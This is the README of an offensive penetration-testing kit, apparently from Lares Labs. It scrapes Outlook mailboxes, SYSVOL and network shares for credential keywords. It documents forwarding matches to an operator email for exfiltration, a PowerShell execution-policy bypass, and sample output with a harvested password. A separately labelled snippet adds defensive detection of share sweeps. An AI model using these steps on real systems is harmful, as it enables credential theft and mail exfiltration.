Brought to you by Neil Lines & Andy Gill at Lares Labs.
Scraping Kit is made up of several tools for scraping services for keywords. It is useful for initial enumeration of Domain Controllers or, if you have popped a user's desktop, their Outlook client. Each component has a function that currently supports scraping and emailing the contents to a designated email address for easy exfiltration.
The kit contains two tools currently, with more to come in the coming months and more customisation options.
It helps identify files that contain specific keywords, both in emails via the Outlook desktop app and on the local domain controller via the Policies and Scripts directories within the SYSVOL folder of an Active Directory domain. It then provides information about the matches and can be used to hunt for words such as username and password present in those files.
Read this blog post over on Lares Labs for more detailed information:
https://labs.lares.com/introducing-scraping-kit/
- Right-click on the project 'ScrapeKit' under Solution Explorer and select Manage NuGet Packages.
- Click Browse, search for the packages below, and install.
  - Microsoft.Office.Interop.Outlook, version 15.0.4797.1004
  - MicrosoftOfficeCore, version 15.0.0
  - System.DirectoryServices, version 7.0.1
  - System.DirectoryServices.AccountManagement, version 7.0.0
- TargetFramework: net6.0
Compile, then execute with either PowerShell or CMD or, if you have physical access, double-click it. The following menu screen will load.
Please select an option:
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
The Sharp implementation of the tool will pull the domain from environment variables, or, if you want to specify it manually, it will prompt you to do so.
After selecting option 1, you will be asked for a destination email address; all matches will be forwarded to that address.
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
1
Enter the email address to forward matching emails:
dhfrdfdg@REDACTED.com
Would you like to only scrape for the following keywords: 'password', 'security', 'confidential', 'VPN', and 'WIFI' (Y/N)
Y
Matching email found. Forwarded the email information to dhfrdfdg@REDACTED.com
You can select the default keywords or add your own keywords by selecting N at the prompt.
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
1
Enter the email address to forward matching emails:
dhfrdfdg@REDACTED.com
Would you like to only scrape for the following keywords: 'password', 'security', 'confidential', 'VPN', and 'WIFI' (Y/N)
n
Enter additional keywords (comma-separated):
happy1
Matching email found. Forwarded the email information to dhfrdfdg@REDACTED.com
C:\Users\user2>C:\Users\user2\Desktop\ScrapeKit.exe
Please select an option:
1. Run Outlook Email Search
2. Run Active Directory Keyword Search
3. Exit
2
Please provide at least one keyword as a command-line argument.
happy
Match found in file \\WIN-4Q0A4190APL.hacklab.local\SYSVOL\HACKLAB.LOCAL\Scripts\Test1\Herllo.txt!
Additional keywords found in the context:
user
username
name
username:
username:
Context:
sfsfisfjhsf sfjbsfj sf sf
username: happy1
password: test1
PSScrapeKit is a PowerShell implementation of ScrapeKit. It consists of two files, DCScraper and OutlookScrape, each with a specific function: scraping either a DC or Outlook. The Outlook scraper will connect to the user's Outlook client, search for keywords, then queue up any interesting emails and send them to an email address of your choosing. The DC scraper will connect to SYSVOL and look for specific keywords or a default list.
- DCScrape.ps1
- OutlookScrape.ps1
See PSScrapeKit
Simply import the module then execute it:
ipmo .\OutlookScrape.ps1
Invoke-OutlookScrape
It will give you two options:
Select keyword option:
1. User-defined keywords
2. Default keywords (password, security, confidential, VPN, WIFI)
Enter the keyword option:
Simply select an option, then specify an email address, and the rest will queue up and do its thing.
Invoke-Scrape.ps1
Offers users the following two options:
- Scrape the Domain Controller - This option will only scrape NETLOGON and SYSVOL directories.
- Scrape all Domain Shares - This option only scrapes NETLOGON on the DC and then all other readable available domain shares.
SYSVOL contains Group Policies (GPP); if you don't want to manually review them, use option 1.
Invoke-NetShareScrape.ps1
Used to hunt for keywords in files stored across network shares. Invoke-NetShareScrape.ps1 will enumerate all shares that the executing user can access, and then scrape files of the following formats for the user-defined keywords: .txt|.ini|.xml|.bat|.ps1|.doc|.docx|.xlsx|.xls
PS C:\> powershell.exe -nop -exec bypass
PS C:\> Import-Module Invoke-NetShareScrape.ps1
PS C:\> Invoke-NetShareScrape
Enter initial keyword (or press enter to finish):
cat
Enter additional keyword (or press enter to finish):
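From the defender's side, a keyword sweep like the ones above shows up as one account opening many different script and document files on a share in a short time. The following added example (not part of ScrapeKit or the original page) flags that pattern in file-share audit records; it assumes Windows Security event 5145 (Detailed File Share auditing) is collected, and the record layout, window, threshold and sample events are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# File types the page lists for Invoke-NetShareScrape.
EXT = re.compile(r"\.(txt|ini|xml|bat|ps1|docx?|xlsx?)$", re.I)
WINDOW = timedelta(minutes=5)  # assumption: baseline and tune per environment
THRESHOLD = 5                  # assumption: distinct files per source per window

def ev(ts, user, ip, share, path):
    """Build one record using event 5145 field names."""
    return {"time": ts, "SubjectUserName": user, "IpAddress": ip,
            "ShareName": share, "RelativeTargetName": path}

def find_share_sweeps(events, window=WINDOW, threshold=THRESHOLD):
    """Map (user, ip) -> peak count of distinct matching files read in any window."""
    by_src = defaultdict(list)
    for e in events:
        if EXT.search(e["RelativeTargetName"]):
            name = (e["ShareName"] + "\\" + e["RelativeTargetName"]).lower()
            by_src[(e["SubjectUserName"], e["IpAddress"])].append((e["time"], name))
    hits = {}
    for src, reads in by_src.items():
        reads.sort()
        start, peak = 0, 0
        for end in range(len(reads)):
            # Advance the left edge until the span fits inside `window`.
            while reads[end][0] - reads[start][0] > window:
                start += 1
            peak = max(peak, len({n for _, n in reads[start:end + 1]}))
        if peak >= threshold:
            hits[src] = peak
    return hits

# Constructed sample events (invented hosts, users and paths).
T0 = datetime(2024, 1, 1, 9, 0)
SYSVOL = r"\\*\SYSVOL"
SAMPLE = (
    # user2: six different files under Scripts within one minute
    [ev(T0 + timedelta(seconds=10 * i), "user2", "10.0.0.50", SYSVOL,
        rf"hacklab.local\Scripts\dir{i}\notes{i}.txt") for i in range(6)]
    # alice: the same logon script read repeatedly (one distinct file)
    + [ev(T0 + timedelta(seconds=i), "alice", "10.0.0.21", SYSVOL,
          r"hacklab.local\Scripts\logon.bat") for i in range(8)]
    # backup: six different files, but one every 20 minutes
    + [ev(T0 + timedelta(minutes=20 * i), "backup", "10.0.0.9", SYSVOL,
          rf"hacklab.local\Policies\p{i}\gpt.ini") for i in range(6)]
)

if __name__ == "__main__":
    for (user, ip), n in find_share_sweeps(SAMPLE).items():
        print(f"{user} from {ip}: {n} distinct files in {WINDOW}")
```

Normal Group Policy processing also reads SYSVOL, so the threshold needs a baseline from your own clients before it is used for alerting.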
- Share Scraping Module, similar to Snaffler but more OPSEC safe
- Scraping contents of specific files on DCs/Other hosts
- Other automation and enumeration